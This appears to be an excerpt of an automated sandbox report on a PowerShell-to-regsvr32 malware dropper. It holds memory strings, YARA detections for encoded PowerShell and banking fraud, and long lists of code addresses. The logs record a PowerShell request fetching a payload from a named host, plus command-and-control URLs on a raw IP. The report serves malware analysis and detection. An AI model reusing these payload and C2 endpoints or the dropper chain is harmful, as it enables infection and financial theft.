                  Source: powershell.exe, 00000002.00000002.320009117.0000000004E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: svchost.exe, 0000000A.00000002.319116790.000001C280013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                  Source: powershell.exe, 00000002.00000002.320823240.00000000051EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.320777939.00000000051DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jsonsintl.com
                  Source: powershell.exe, 00000002.00000002.320849477.00000000051F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jsonsintl.com/
                  Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/
                  Source: powershell.exe, 00000002.00000002.320777939.00000000051DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jsonsintl.com4
                  Source: svchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                  Source: svchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
                  Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/
                  Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/
                  Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/P
                  Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/l
                  Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/temV
                  Source: svchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
                  Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                  Source: svchost.exe, 00000008.00000002.504401163.000001EB54229000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                  Source: svchost.exe, 00000008.00000002.504401163.000001EB54229000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                  Source: powershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                  Source: svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                  Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                  Source: svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                  Source: svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                  Source: svchost.exe, 0000000A.00000002.319452146.000001C28006A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317899105.000001C280068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                  Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                  Source: svchost.exe, 0000000A.00000002.319333412.000001C28004B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                  Source: svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                  Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                  Source: svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                  Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                  Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                  Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                  Source: svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319306799.000001C280042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318517655.000001C280041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                  Source: svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319306799.000001C280042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318517655.000001C280041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                  Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                  Source: svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                  Source: svchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                  Source: svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                  Source: svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                  Source: svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                  Source: svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                  Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                  Source: svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                  Source: svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                  Source: powershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000002.00000003.299865395.00000000058F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nakharinitwebhosting.com/HSDYKN1X5GLF/
                  Source: powershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: svchost.exe, 00000016.00000003.403457617.0000019AC6A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403341632.0000019AC6A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403309481.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403251071.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403390455.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403218435.0000019AC6599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                  Source: svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                  Source: svchost.exe, 0000000A.00000002.319116790.000001C280013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                  Source: svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                  Source: svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318500901.000001C280045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                  Source: svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                  Source: svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318593022.000001C28003A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                  Source: svchost.exe, 0000000A.00000002.319333412.000001C28004B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                  Source: svchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                  Source: svchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                  Source: svchost.exe, 00000016.00000003.403457617.0000019AC6A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403341632.0000019AC6A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403309481.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403251071.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403390455.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403218435.0000019AC6599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                  Source: svchost.exe, 00000016.00000003.403457617.0000019AC6A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403341632.0000019AC6A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403309481.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403251071.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403390455.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403218435.0000019AC6599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                  Source: svchost.exe, 00000016.00000003.412280147.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.412123410.0000019AC659A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                  Source: unknownDNS traffic detected: queries for: www.jsonsintl.com
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180006B24 InternetReadFile,
                  Source: global trafficHTTP traffic detected: GET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.jsonsintl.comConnection: Keep-Alive

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 16.2.regsvr32.exe.28c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.regsvr32.exe.c60000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.regsvr32.exe.c60000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.regsvr32.exe.28c0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.323155942.00000000028C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.505000054.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Source: Process Memory Space: powershell.exe PID: 6408, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPJump to dropped file
                  Source: Process Memory Space: powershell.exe PID: 6408, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\AHWppkeB\Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CF12B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CF4A70
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CF5E01
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CF5CAD
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CF6850
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CF443C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CF53FB
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_010E0000
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180006414
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180005C74
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002ACE8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180024104
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180020118
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000359C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000E99C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180019628
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180025A4C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002B7B2
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180009408
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180023C14
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002582C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000B834
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000403C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180021444
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180012044
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180016054
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001705C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180001870
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001F878
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180014484
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180015494
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000BC98
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180008C9C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800078A4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001F0A8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001E4AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800048B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001ACB4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800090B4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800270C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800024C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800280C8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800050D4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800234D8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800150F0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180012500
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001A10C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180028D10
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001A524
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180002D28
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000E130
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180029134
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180008134
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180022140
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180006954
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000F554
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002B564
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180012168
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180013568
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180024570
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180019178
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180025180
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180001980
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180021588
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001A988
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180018190
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180013994
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180028998
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800061A0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800135A6
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180016DA8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800059AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800135B4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001C1B8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800025B8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800085BC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800015C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800295C8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800229CC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000E5D4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002A5D8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800261E0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800079EC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180023624
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180018628
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180017E2C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180017638
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180004E3C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180020E40
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180015A64
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180015264
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000A26C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180007678
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001667C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180012680
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180001E88
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000968C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180022290
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180026A90
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000529C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180020AA0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180022AAC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180007EB4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800162BC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800252C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001AEC8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001F6DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800026DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180002ADC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001E2F4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180016AF4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000DEF4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001DEFC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180006308
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001370C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180004B18
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180015F24
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180006B24
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000F328
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180021738
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002AF38
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180028348
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000DB4C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180014F50
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000B350
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000A758
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002975C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180024370
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180008370
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180015774
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180012378
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180026B98
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001CF9C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001EBA0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001B3A4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000D7AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800053B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180015BB8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800207BC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000FFC0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800173DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180018BDC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00C30000
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180006414
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000C819
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180019628
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180025A4C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180012864
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180005C74
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800248B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800252C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180006B24
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180006F2C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000A758
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180024570
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000E99C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001B3A4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800079EC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180009408
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180023C14
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180023624
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180018628
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002582C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180017E2C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000B834
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180017638
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000403C
